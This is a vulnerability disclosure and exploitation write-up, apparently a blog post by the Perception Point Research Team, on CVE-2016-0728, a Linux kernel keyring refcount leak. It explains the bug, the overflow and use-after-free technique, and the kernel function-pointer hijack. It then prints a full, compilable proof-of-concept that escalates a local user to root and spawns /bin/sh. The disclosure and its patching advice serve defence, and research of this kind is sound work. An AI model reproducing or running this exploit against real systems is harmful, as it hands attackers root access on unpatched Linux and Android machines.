ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

By Perception Point Research Team

Introduction

The Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel. While the vulnerability has existed since 2012, our team discovered the vulnerability only recently, disclosed the details to the Kernel
security team, and later developed a proof-of-concept exploit. As of the date of disclosure, this vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets). While neither
us nor the Kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible.

In this write-up, we’ll discuss the technical details of the vulnerability as well as the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided
successfully escalates privileges from a local user to root.

The Bug

CVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details,
let’s cover some background required to understand the bug.

Quoting directly from its manpage, the keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces – keyctl syscall (there
are two other syscalls that are used for handling keys: add_key and request_key. keyctl, however, is definitely the most important one for this write-up.) are provided so that userspace programs can manage those objects and use the facility for their own purposes.

Each process can create a keyring for the current session usingkeyctl(KEYCTL_JOIN_SESSION_KEYRING, name) and can choose to either assign a name to the keyring or not by passing NULL. The keyring object can be shared
between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object’s internal refcount, stored in a field called usage,
is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, the execution jumps to error2 label which skips the
call tokey_put and leaks the reference that was increased by find_keyring_by_name.

	long join_session_keyring(constchar *name)
	{
	...
	new = prepare_creds();
	...
	keyring = find_keyring_by_name(name,false);//find_keyring_by_name increments keyring->usage if a keyring was found
	if (PTR_ERR(keyring) == -ENOKEY) {
	/* not found - try and create a new one */
	keyring = keyring_alloc(
	name, old->uid, old->gid, old,
	KEY_POS_ALL \| KEY_USR_VIEW \| KEY_USR_READ \| KEY_USR_LINK,
	KEY_ALLOC_IN_QUOTA, NULL);
	if (IS_ERR(keyring)) {
	ret = PTR_ERR(keyring);
	goto error2;
	}
	} else if (IS_ERR(keyring)) {
	ret = PTR_ERR(keyring);
	goto error2;
	} else if (keyring == new->session_keyring) {
	ret = 0;
	goto error2; //<-- The bug is here, skips key_put.
	}

	/* we've got a keyring - now install it */
	ret = install_session_keyring_to_cred(new, keyring);
	if (ret < 0)
	goto error2;

	commit_creds(new);
	mutex_unlock(&key_session_mutex);

	ret = keyring->serial;
	key_put(keyring);
	okay:
	return ret;

	error2:
	mutex_unlock(&key_session_mutex);
	error:
	abort_creds(new);
	return ret;
	}

view
raw process_keys.c hosted with

by GitHub

Triggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:

	/* $ gcc leak.c -o leak -lkeyutils -Wall */
	/* $ ./leak */
	/* $ cat /proc/keys */

	#include <stddef.h>
	#include <stdio.h>
	#include <sys/types.h>
	#include <keyutils.h>

	int main(int argc, const char *argv[])
	{
	int i = 0;
	key_serial_t serial;

	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING,"leaked-keyring");
	if (serial < 0) {
	perror("keyctl");
	return -1;
	}

	if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL \| KEY_USR_ALL) <0) {
	perror("keyctl");
	return -1;
	}

	for (i = 0; i < 100; i++) {
	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING,"leaked-keyring");
	if (serial < 0) {
	perror("keyctl");
	return -1;
	}
	}

	return 0;
	}

view
raw leak.c hosted with

by GitHub

which results the following output having leaked-keyring 100 references:

Exploiting the Bug

Even though the bug itself can directly cause a memory leak, it has far more serious consequences. After a quick examination of the relevant code flow, we found that the usage field used to store the reference count for the object is of
type atomic_t, which under the hood, is basically an int – meaning 32-bit on both 32-bit and 64-bit architectures. While every integer is theoretically possible to overflow, this particular observation makes practical exploitation of this bug as a way to overflow
the reference count seem feasible. And it turns out no checks are performed to prevent overflowing the usage field from wrapping around to 0.

If a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. If the same process holds another legitimate reference and uses it
after the kernel freed the object, it will cause the kernel to reference deallocated, or a reallocated memory. This way, we can achieve a use-after-free, by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation
in the kernel, so the following steps wouldn’t surprise an experienced vulnerability researcher. The outline of the steps that to be executed by the exploit code is as follows:

Hold a (legitimate) reference to a key object
Overflow the same object’s usage
Get the keyring object freed
Allocate a different kernel object from user-space, with a user-controlled content, over the same memory previously used by the freed keyring object
Use the reference to the old key object and trigger code execution

Step 1 is completely out of the manpage, step 2 was explained earlier. Let’s dive into the technical details of the rest of the steps.

Overflowing usage Refcount

This step is actually an extension of the bug. The usage field is of int type which means it has a max value of 2^32 both on 32-bit and 64-bit architectures. To overflow the usage field we have
to loop the snippet above 2^32 times to get usage to zero.

Freeing keyring object

There are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is using one process to overflow the keyring usage field to 0 and getting the object freed by the Garbage Collection algorithm inside the keyring subsystem
which frees any keyring object the moment the usage counter is 0.

One caveat though, if we look at the join_session_keyring function prepare_creds also increments the current session keyring and abort_creds or commit_creds decrements it respectively. The problem
is that abort_creds doesn’t decrement the keyring’s usage field synchronically but it is called later using rcu job, which means we can overflow the usage counter without
knowing it was overflowed. It is possible to solve this issue by using sleep(1) after each call to join_session_keyring, of course it is not feasible to sleep(2^32) seconds. A feasible work around will be to use a variation of the divide-and-conquer
algorithm and to sleep after 2^31-1 calls, then after 2^30-1 etc… this way we never overflow unintentionally because the maximum value of refcount can be double the value it should be if no jobs where called.

Allocating and controlling kernel object

Having our process point to a freed keyring object, now we need to allocate a kernel object that will override the freed keyring object. That will be easy thanks to how SLAB memory works, allocating many objects of the keyring size
just after the object is freed. We choose to use the Linux IPC subsystem to send messages of size 0xb8 – 0x30 when 0xb8 is the size of the keyring object and 0x30 is the size of a message header.

	if ((msqid = msgget(IPC_PRIVATE,0644 \| IPC_CREAT)) == -1) {
	perror("msgget");
	exit(1);
	}
	for (i = 0; i < 64; i++) {
	if (msgsnd(msqid, &msg,sizeof(msg.mtext),0) == -1) {
	perror("msgsnd");
	exit(1);
	}
	}

view
raw allocate_from_user.c hosted with

by GitHub

This way we control the lower 0x88 bytes of the keyring object.

Gaining kernel code execution

From here it’s pretty easy thanks to the struct key_type inside the keyring object which contains many function pointers. An interesting function pointer is the revoke function pointer which can be invoked using the keyctl(KEY_REVOKE,
key_name) syscall. The following is the Linux kernel snippet calling the revoke function:


	void key_revoke(struct key *key)
	{
	. . .
	if (!test_and_set_bit(KEY_FLAG_REVOKED, &key->flags) &&
	key->type->revoke)
	key->type->revoke(key);
	. . .
	}

view
raw key.c hosted with

by GitHub

The keyring object should be filled as follows:

The uid and flags attributes should be filled that way to pass a few control check until the execution gets to key->type->revoke. The type field should point to a user-space struct containing the function pointers
with revoke pointing to a function that will be executed with root privileges. Here is a code snippet that demonstrates this.

	typedef int __attribute__((regparm(3))) (* _commit_creds)(unsignedlong cred);
	typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsignedlong cred);

	struct key_type_s {
	void * [12] padding;
	void * revoke;
	} type;

	_commit_creds commit_creds = 0xffffffff81094250;
	_prepare_kernel_cred prepare_kernel_cred = 0xffffffff81094550;

	void userspace_revoke(void * key) {
	commit_creds(prepare_kernel_cred(0));
	}

	int main(int argc, const char *argv[]) {
	...
	struct key_type * my_key_type =NULL;
	...
	my_key_type = malloc(sizeof(*my_key_type));
	my_key_type->revoke = (void*)userspace_revoke;
	...
	}

view
raw use_after_free.c hosted with

by GitHub

Addresses of commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version/android device.

Now the last step is of course:

execl("/bin/sh",NULL);

view
raw get_root.c hosted with

by GitHub

here is a link to the full exploit which runs on kernel 3.18 64-bit, following is the output of
running the full exploit which takes about 30 minutes to run on Intel Core i7-5500 CPU (Usually time is not an issue in a privilege escalation exploit):

Mitigations & Conclusions

The vulnerability affects any Linux Kernel version 3.8 and higher. SMEP & SMAP will make it difficult to exploit as well as SELinux on android devices. Maybe we’ll talk about tricks to bypass those mitigation in upcoming blogs, anyway the most important thing
for now is to patch it as soon as you can.

Thanks to David Howells, Wade Mealing and the whole Red Hat Security team for that fast response and the cooperation fixing the bug.

Perception Point Research Team

raw code：

/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */

/* $ ./cve_2016_072 PP_KEY */

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/types.h>

#include <keyutils.h>

#include <unistd.h>

#include <time.h>

#include <unistd.h>

#include <sys/ipc.h>

#include <sys/msg.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)

#define COMMIT_CREDS_ADDR (0xffffffff81094250)

#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)

struct key_type {

    char * name;

    size_t datalen;

    void * vet_description;

    void * preparse;

    void * free_preparse;

    void * instantiate;

    void * update;

    void * match_preparse;

    void * match_free;

    void * revoke;

    void * destroy;

};

void userspace_revoke(void * key) {

    commit_creds(prepare_kernel_cred(0));

}

int main(int argc, const char *argv[]) {

	const char *keyring_name;

	size_t i = 0;

    unsigned long int l = 0x100000000/2;

	key_serial_t serial = -1;

	pid_t pid = -1;

    struct key_type * my_key_type = NULL;

struct { long mtype;

		char mtext[STRUCT_LEN];

	} msg = {0x4141414141414141, {0}};

	int msqid;

	if (argc != 2) {

		puts("usage: ./keys <key_name>");

		return 1;

	}

    printf("uid=%d, euid=%d\n", getuid(), geteuid());

    commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;

    prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;

    my_key_type = malloc(sizeof(*my_key_type));

    my_key_type->revoke = (void*)userspace_revoke;

    memset(msg.mtext, 'A', sizeof(msg.mtext));

    // key->uid

    *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */

    //key->perm

    *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;

    //key->type

    *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {

        perror("msgget");

        exit(1);

    }

    keyring_name = argv[1];

	/* Set the new session keyring before we start */

	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);

	if (serial < 0) {

		perror("keyctl");

		return -1;

    }

	if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {

		perror("keyctl");

		return -1;

	}

	puts("Increfing...");

    for (i = 1; i < 0xfffffffd; i++) {

        if (i == (0xffffffff - l)) {

            l = l/2;

            sleep(5);

        }

        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {

            perror("keyctl");

            return -1;

        }

    }

    sleep(5);

    /* here we are going to leak the last references to overflow */

    for (i=0; i<5; ++i) {

        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {

            perror("keyctl");

            return -1;

        }

    }

    puts("finished increfing");

    puts("forking...");

    /* allocate msg struct in the kernel rewriting the freed keyring object */

    for (i=0; i<64; i++) {

        pid = fork();

        if (pid == -1) {

            perror("fork");

            return -1;

        }

        if (pid == 0) {

            sleep(2);

            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {

                perror("msgget");

                exit(1);

            }

            for (i = 0; i < 64; i++) {

                if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {

                    perror("msgsnd");

                    exit(1);

                }

            }

            sleep(-1);

            exit(1);

        }

    }

    puts("finished forking");

    sleep(5);

    /* call userspace_revoke from kernel */

    puts("caling revoke...");

    if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {

        perror("keyctl_revoke");

    }

    printf("uid=%d, euid=%d\n", getuid(), geteuid());

    execl("/bin/sh", "/bin/sh", NULL);

    return 0;

}

https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f